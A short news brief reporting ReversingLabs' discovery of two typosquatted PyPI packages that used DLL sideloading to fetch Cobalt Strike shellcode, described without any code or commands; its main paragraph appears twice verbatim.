Malicious Python Package Index packages NP6HelperHttptest and NP6HelperHttper, which had more than 700 cumulative downloads before being removed, facilitated security software bypass and malicious code execution through DLL sideloading, The Hacker News reports.
Both packages, which are typosquatted versions of tools issued by ChapsVision for its NP6 marketing automation solution, contained a script enabling the download of a Kingsoft executable susceptible to DLL sideloading, a report from ReversingLabs showed. Moreover, the sideloaded DLL then retrieves a Cobalt Strike Beacon shellcode purporting to be a GIF file from an attacker-controlled domain. Researchers also noted the possibility of a wider campaign using malicious PyPI packages to deploy executables vulnerable to DLL sideloading. "Development organizations need to be aware of the threats related to supply chain security and open-source package repositories. Even if they are not using open-source package repositories, that doesn't mean that threat actors won't abuse them to impersonate companies and their software products and tools," said ReversingLabs researcher Karlo Zanki.
Both packages, which are typosquatted versions of tools issued by ChapsVision for its NP6 marketing automation solution, contained a script enabling the download of a Kingsoft executable susceptible to DLL sideloading, a report from ReversingLabs showed. Moreover, the sideloaded DLL then retrieves a Cobalt Strike Beacon shellcode purporting to be a GIF file from an attacker-controlled domain. Researchers also noted the possibility of a wider campaign using malicious PyPI packages to deploy executables vulnerable to DLL sideloading. "Development organizations need to be aware of the threats related to supply chain security and open-source package repositories. Even if they are not using open-source package repositories, that doesn't mean that threat actors won't abuse them to impersonate companies and their software products and tools," said ReversingLabs researcher Karlo Zanki.